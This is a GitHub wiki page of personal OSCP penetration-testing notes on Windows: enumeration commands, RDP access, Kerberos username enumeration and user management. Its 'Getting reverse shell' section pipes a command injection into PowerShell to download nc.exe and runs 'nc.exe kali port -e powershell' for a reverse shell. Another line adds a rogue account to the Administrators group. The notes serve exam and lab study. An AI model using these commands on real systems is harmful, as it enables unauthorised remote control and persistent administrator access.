Windows - A1vinSmith/OSCP-PWK GitHub Wiki
Linux equivalents e.g. dir -force or dir /a
https://www.lemoda.net/windows/windows2unix/windows2unix.html
Check for system version
systeminfo which coincidently with Metasploit sysinfo
RDP
xfreerdp
xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:IP /u:USER /p:'Password'
File Transfer
https://www.hackingarticles.in/file-transfer-cheatsheet-windows-and-linux/
or
https://academy.hackthebox.eu/module/24
Using kerbrute userenum to enumerate valid domain usernames via Kerberos
kerbrute userenum -d spookysec.local --dc spookysec.local userlist.txt -t 100
Listening on the box / Reverse ping listener
tcpdump -i utun4 icmp or like sudo tcpdump -i tun0 icmp.
when doing this. ping different from linux. ping -n 5 ip. n is count here not c
Getting reverse shell
uploading via powershell & curl
# https://github.com/moparisthebest/static-curl
# locate nc.exe on your kali
sqli or other cmd | powershell curl target:ip/nc.exe -o nc.exe
nc.exe kali port -e powershell
rlwrap is better when doing windows
# https://tanguy.ortolo.eu/blog/article88/rlwrap
rlwrap nc -nvlp 4242
Users
list all users
net users
get details
net user bob it gives you more details about the user Bob, including which groups they belong to.
net userthen it gives you a list of users.net user Guestthen it gives you more details about the Guest user, including which groups they belong to.net localgroupthen it gives you a list of local groups.net localgroup Usersthen it gives you more details about the Users group, including the members.
add a user to Administrators group
net user avlin passw0rd! /add ; net localgroup administrators alvin /add
Compile c/c++
x86_64-w64-mingw32-gcc -o shell.exe ProgramName.c
Check files/folder permissions
icacls